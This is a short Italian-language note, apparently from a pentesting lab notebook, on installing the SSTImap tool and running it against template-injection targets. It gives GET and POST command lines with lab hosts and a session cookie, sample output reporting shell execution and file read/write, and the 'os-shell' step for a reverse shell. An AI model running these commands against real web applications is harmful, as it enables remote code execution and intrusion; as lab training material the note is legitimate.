tags: SSTIMap SSTI SSTI_Automation


Questo strumento automatizza un sacco di payload alla ricerca di una vulnerabilità SSTI, lo puoi scaricare nel seguente modo:

 
git clone https://github.com/vladko312/SSTImap.git
 
cd SSTImap
 
python3 -m venv myenv
 
source myenv/bin/activate
 
pip install -r requirements.txt
 

Richiesta GET

python3 sstimap.py -u http://10.10.129.18:5000/profile/* -i

Richiesta POST

Con un solo parametro

python3 sstimap.py -X POST -u 'http://ssti.thm:8002/mako/' -d 'page=' -i
 
run

Con più parametri

python3 sstimap.py -u 'http://ssti.thm:8080/admin/forms/option_lists/edit.php' --data "update_page=1&num_rows=0&option_list_name=New+Option+List+%28746%29&is_grouped=yes&group_name_2947=pannino*&update=Update&option_list_sortable__rows=2947%7C&option_list_sortable__new_groups=&option_list_sortable__deleted_rows=" --cookie "PHPSESSID=ad094f3d803ddaa9e2eeb7676b537d34" -i

Nel caso restituisse questo risultato:

Body parameter: page
  Engine: Python_generic
  Injection: ${*}
  Context: text
  OS: posix-linux
  Technique: rendered
  Capabilities:
 
    Shell command execution: ok
    Bind and reverse shell: ok
    File write: ok
    File read: ok
    Code evaluation: ok, python code

Ci basta digitare questo comando per ottenere una reverse shell:

os-shell